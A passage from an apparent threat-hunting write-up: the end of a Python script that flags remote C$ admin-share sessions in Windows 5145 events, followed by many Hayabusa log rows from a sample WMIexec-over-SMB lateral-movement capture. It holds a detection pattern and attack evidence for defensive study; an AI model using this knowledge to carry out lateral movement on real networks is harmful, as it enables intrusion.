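                  if k[2] not in local_addrs and any(is_admin_share(n) for n in s["shares"]))


if __name__ == "__main__":
    found = summarise_sessions(SAMPLE_CSV)
    for key in flag_remote_admin_share_sessions(found):
        s = found[key]
        print(f"{key[1]}@{key[2]} LID {key[3]} on {key[0]}: {s['count']} accesses, "
              f"{len(s['paths'])} distinct paths, shares={sorted(s['shares'])}, "
              f"{s['first']} .. {s['last']}")
```

Both admmig sessions are reported and the jdoe row is not. The NativeImages paths under Windows\assembly and the per-folder desktop.ini reads under Users\admmig are kept in the per-session path set rather than filtered out: the session-level view (one account, one source address, C$ only, many objects within a fraction of a second) is what separates this from a file server's routine share traffic, and dropping paths would hide that volume. Hayabusa only emits these rows when the 5145 rule is enabled (it lives under rules/hayabusa/non-default) and the host audits Detailed File Share, so absence of rows is not evidence of absence.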
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 
